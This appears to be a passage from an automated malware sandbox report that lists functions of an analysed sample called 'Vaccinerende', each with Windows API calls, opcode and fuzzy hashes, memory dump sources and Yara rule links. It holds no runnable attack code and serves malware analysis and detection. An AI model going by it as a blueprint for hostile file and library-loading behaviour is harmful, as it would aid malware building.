                                                                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                              Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                              • String ID:
                                                                              • API String ID: 1125800050-0
                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                              Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleSleep
                                                                              • String ID: }A
                                                                              • API String ID: 252777609-2138825249
                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                              Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • malloc.MSVCRT ref: 00409A10
                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                              • free.MSVCRT ref: 00409A31
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: freemallocmemcpy
                                                                              • String ID:
                                                                              • API String ID: 3056473165-0
                                                                              • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                              • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                              Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: BINARY
                                                                              • API String ID: 2221118986-907554435
                                                                              • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                              • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                              Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID: /stext
                                                                              • API String ID: 2081463915-3817206916
                                                                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                              Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$??2@CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 1023896661-0
                                                                              • Opcode ID: 6ed92b0bd968f8c5d07b599056bf9567f50ecade68025785c49dbe497b9d775a
                                                                              • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                              • Opcode Fuzzy Hash: 6ed92b0bd968f8c5d07b599056bf9567f50ecade68025785c49dbe497b9d775a
                                                                              • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                              Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                              • CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 2445788494-0
                                                                              • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                              • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                              Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmpmemset
                                                                              • String ID:
                                                                              • API String ID: 1065087418-0
                                                                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                              Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00410654
                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 1381354015-0
                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                              Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free
                                                                              • String ID:
                                                                              • API String ID: 1294909896-0
                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                              Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                              • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                              • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                              • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                              Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                              • String ID:
                                                                              • API String ID: 2154303073-0
                                                                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                              Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 3150196962-0
                                                                              • Opcode ID: a94dde180b5e7858e08a1fdfedeb276c5dc53694cab170f4bca00bd3a8baa0de
                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                              • Opcode Fuzzy Hash: a94dde180b5e7858e08a1fdfedeb276c5dc53694cab170f4bca00bd3a8baa0de
                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$PointerRead
                                                                              • String ID:
                                                                              • API String ID: 3154509469-0
                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                              • String ID:
                                                                              • API String ID: 4232544981-0
                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                              Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
